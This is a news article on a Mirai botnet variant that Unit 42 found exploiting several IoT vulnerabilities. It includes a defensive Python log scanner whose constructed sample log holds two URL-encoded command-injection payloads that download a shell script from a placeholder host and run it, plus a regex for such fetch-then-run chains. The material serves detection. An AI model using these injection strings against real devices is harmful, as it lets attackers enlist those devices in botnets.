Security researchers from Palo Alto Networks have discovered another Mirai variant that is targeting new IoT vulnerabilities.
Researchers from Unit 42, the cybersecurity division of Palo Alto Networks, discovered a number of attacks that leveraged vulnerabilities including:
- VisualDoor (a SonicWall SSL-VPN exploit)
- CVE-2020-25506 (a D-Link DNS-320 firewall exploit)
- CVE-2020-26919 (a Netgear ProSAFE Plus exploit)
- Possibly CVE-2019-19356 (a Netis WF2419 wireless router exploit)
- Three other IoT vulnerabilities yet to be identified
Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviours such as downloading and executing Mirai variants and brute-forcers.
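The download-and-execute stage described above usually shows up in the web-server access logs of the exposed device as a command-injection request that fetches a script from a staging host and then runs it. The snippet below is an added illustration of how a defender could flag that stage; it is not code from the Unit 42 report or from this article. The log lines, the IP addresses (documentation ranges) and the `scan_access_log` helper are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Two of them carry the
# post-exploitation stage described in the article: a command injection that
# fetches a shell script from a staging host and then executes it.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Mar/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.11 - - [01/Mar/2021:10:00:02 +0000] "GET /cgi-bin/login.cgi?user=admin HTTP/1.1" 200 310
203.0.113.12 - - [01/Mar/2021:10:00:03 +0000] "GET /setup.cgi?cmd=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F198.51.100.5%2Fbins%2Fx.sh%3Bchmod%20777%20x.sh%3Bsh%20x.sh HTTP/1.1" 500 0
203.0.113.13 - - [01/Mar/2021:10:00:04 +0000] "POST /api/run HTTP/1.1" 200 64
203.0.113.14 - - [01/Mar/2021:10:00:05 +0000] "GET /ping.cgi?host=127.0.0.1%60curl%20-s%20http%3A%2F%2F198.51.100.5%2Fa.sh%7Csh%60 HTTP/1.1" 200 20
"""

# Common-log-format fields we need: client IP, timestamp, method, request target, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A download tool, then a shell command separator, then something that executes
# what was just fetched (chmod, a shell, or a ./ invocation).
DOWNLOAD_EXEC = re.compile(
    r"\b(?:wget|curl|tftp|ftpget)\b[^;|&`\n]*[;|&`]+\s*(?:chmod\b|sh\b|bash\b|\./)",
    re.IGNORECASE,
)


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads do not slip past the regex."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(text):
    """Return one record per request whose decoded target contains a fetch-then-run chain."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        decoded = fully_decode(m.group("target"))
        indicator = DOWNLOAD_EXEC.search(decoded)
        if indicator:
            hits.append({
                "src_ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "target": m.group("target"),
                "decoded": decoded,
                "indicator": indicator.group(0),
            })
    return hits


def offending_sources(hits):
    """Distinct client IPs that sent a flagged request, for blocking or further triage."""
    return sorted({h["src_ip"] for h in hits})


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(h["timestamp"], h["src_ip"], "->", h["indicator"])
```

The check keys on the structure of the chain (fetch tool, separator, execution) rather than on any particular host or filename, so it survives the staging server changing between campaigns; the decode loop matters because injected payloads are frequently double-encoded to get past naive filters.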
The researchers also found that one of the IPs involved in the attack was taking advantage of two newer vulnerabilities – CVE-2021-27561 and CVE-2021-27562 – which affect the Yealink DM platform and enable an unauthenticated attacker to run commands on the server with root privileges.
Unit 42 detected the addition of a further exploit that takes advantage of CVE-2020-26919—a vulnerability that affected NETGEAR JGS516PE devices.
‘The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences,’ the researchers added.
In this case, compromised devices download Mirai malware binaries, which add them to a larger IoT botnet capable of carrying out network attacks on a devastating scale.
Given the rapid proliferation of IoT devices – with IDC estimating there will be 41.6 billion connected IoT devices by 2025 – and their often weak security, future attacks will likely dwarf the one carried out against Dyn.